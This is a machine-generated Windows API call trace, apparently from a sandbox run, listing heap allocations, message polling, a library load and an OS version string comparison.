RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0263.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0263.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0263.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.897] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0263.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0263.897] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0263.897] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0263.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0263.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0263.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0263.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0263.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0263.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0263.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0263.899] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0263.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0263.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0263.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0263.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0263.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0263.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0263.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0263.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.900] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0263.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.901] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0263.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.901] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0263.901] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0263.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0263.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0263.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0263.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0263.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.902] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0263.902] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0263.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0263.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0263.903] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0263.903] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.903] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0263.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.904] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0263.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0263.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0263.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0263.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0263.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0263.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0263.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.905] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0263.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0263.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0263.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.906] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.907] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0263.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0263.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.909] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0263.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.909] 